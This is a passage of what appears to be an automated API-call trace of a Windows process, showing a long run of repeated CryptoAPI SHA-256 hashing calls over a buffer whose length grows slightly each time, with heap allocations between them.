Size=0x20) returned 0x32ad1280 [0190.277] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32ad1280, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad1280, pdwDataLen=0xce0bc) returned 1 [0190.277] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.277] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.277] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ad0) returned 1 [0190.278] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.278] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0190.278] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.278] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0f80 [0190.278] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0f80, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0f80, pdwDataLen=0xce0bc) returned 1 [0190.278] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.278] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0190.278] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338232d0) returned 1 [0190.284] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.284] CryptHashData (hHash=0x3396eb70, pbData=0x32349170, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0190.284] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0ec0 [0190.284] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32ad0ec0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0ec0, pdwDataLen=0xce0bc) returned 1 [0190.284] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0190.285] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0190.285] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823ad0) returned 1 [0190.285] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.285] CryptHashData (hHash=0x3396f190, pbData=0x32349170, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0190.285] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad11f0 [0190.285] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32ad11f0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad11f0, pdwDataLen=0xce0bc) returned 1 [0190.285] CryptDestroyHash (hHash=0x3396f190) returned 1 [0190.285] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0190.285] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.286] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.286] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0190.286] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.286] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1010 [0190.286] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32ad1010, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad1010, pdwDataLen=0xce0bc) returned 1 [0190.286] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.286] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.286] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822bd0) returned 1 [0190.287] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.287] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0190.287] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.287] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad09e0 [0190.287] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad09e0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad09e0, pdwDataLen=0xce0bc) returned 1 [0190.287] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.287] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0190.287] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.287] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.287] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0190.287] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.287] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad07d0 [0190.287] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32ad07d0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad07d0, pdwDataLen=0xce0bc) returned 1 [0190.287] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.287] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.287] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821ed0) returned 1 [0190.288] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.288] CryptHashData (hHash=0x3396f660, pbData=0x32349170, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0190.288] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.288] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0ce0 [0190.288] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32ad0ce0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0ce0, pdwDataLen=0xce0bc) returned 1 [0190.288] CryptDestroyHash (hHash=0x3396f660) returned 1 [0190.288] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0190.288] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338233d0) returned 1 [0190.289] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.289] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0190.289] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1190 [0190.289] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad1190, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad1190, pdwDataLen=0xce0bc) returned 1 [0190.289] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.289] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0190.289] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.289] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.289] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0190.290] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.290] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0e30 [0190.290] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32ad0e30, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0e30, pdwDataLen=0xce0bc) returned 1 [0190.290] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.290] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.290] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.290] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.290] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0190.290] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.290] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad08c0 [0190.290] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad08c0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad08c0, pdwDataLen=0xce0bc) returned 1 [0190.290] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.290] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.290] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.291] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.291] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0190.291] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.291] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0b30 [0190.291] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32ad0b30, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0b30, pdwDataLen=0xce0bc) returned 1 [0190.291] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.291] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.291] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822bd0) returned 1 [0190.292] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.292] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0190.292] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.292] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0920 [0190.292] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32ad0920, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0920, pdwDataLen=0xce0bc) returned 1 [0190.292] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.292] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0190.292] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338227d0) returned 1 [0190.292] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.292] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0190.292] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.292] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1160 [0190.292] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32ad1160, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad1160, pdwDataLen=0xce0bc) returned 1 [0190.292] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.292] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0190.292] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338233d0) returned 1 [0190.293] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.293] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0190.293] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.293] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad12b0 [0190.293] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32ad12b0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad12b0, pdwDataLen=0xce0bc) returned 1 [0190.293] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.293] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0190.293] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.294] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.294] CryptHashData (hHash=0x3396f660, pbData=0x32349170, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0190.294] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.294] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0860 [0190.294] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32ad0860, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0860, pdwDataLen=0xce0bc) returned 1 [0190.294] CryptDestroyHash (hHash=0x3396f660) returned 1 [0190.294] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.294] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.297] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.297] CryptHashData (hHash=0x3396ee80, pbData=0x32349170, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0190.297] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.297] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0ef0 [0190.297] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x2, pbData=0x32ad0ef0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0ef0, pdwDataLen=0xce0bc) returned 1 [0190.297] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0190.297] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.297] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822bd0) returned 1 [0190.297] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.297] CryptHashData (hHash=0x3396f5f0, pbData=0x32349170, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0190.297] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.297] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0950 [0190.297] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32ad0950, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0950, pdwDataLen=0xce0bc) returned 1 [0190.297] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0190.297] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0190.297] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338223d0) returned 1 [0190.298] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.298] CryptHashData (hHash=0x3396f190, pbData=0x32349170, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0190.298] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0b60 [0190.298] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32ad0b60, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0b60, pdwDataLen=0xce0bc) returned 1 [0190.298] CryptDestroyHash (hHash=0x3396f190) returned 1 [0190.298] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0190.298] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.299] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.299] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0190.299] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.299] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1250 [0190.299] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32ad1250, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad1250, pdwDataLen=0xce0bc) returned 1 [0190.299] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.299] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.299] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.299] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.299] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0190.300] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad11c0 [0190.300] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad11c0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad11c0, pdwDataLen=0xce0bc) returned 1 [0190.300] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.300] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.300] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.300] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.300] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0190.300] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0e60 [0190.300] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0e60, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0e60, pdwDataLen=0xce0bc) returned 1 [0190.300] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.300] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.300] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821ed0) returned 1 [0190.301] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.301] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0190.301] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.301] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0b00 [0190.301] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32ad0b00, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0b00, pdwDataLen=0xce0bc) returned 1 [0190.301] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.301] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0190.301] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.302] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.302] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0190.302] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.302] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0890 [0190.302] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0890, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0890, pdwDataLen=0xce0bc) returned 1 [0190.302] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.302] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.302] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823ad0) returned 1 [0190.302] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.302] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0190.302] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.302] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0b90 [0190.302] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32ad0b90, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0b90, pdwDataLen=0xce0bc) returned 1 [0190.302] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.303] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0190.303] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.303] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.303] CryptHashData (hHash=0x3396ee80, pbData=0x32349170, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0190.303] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.303] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1220 [0190.303] CryptGetHashParam (in: 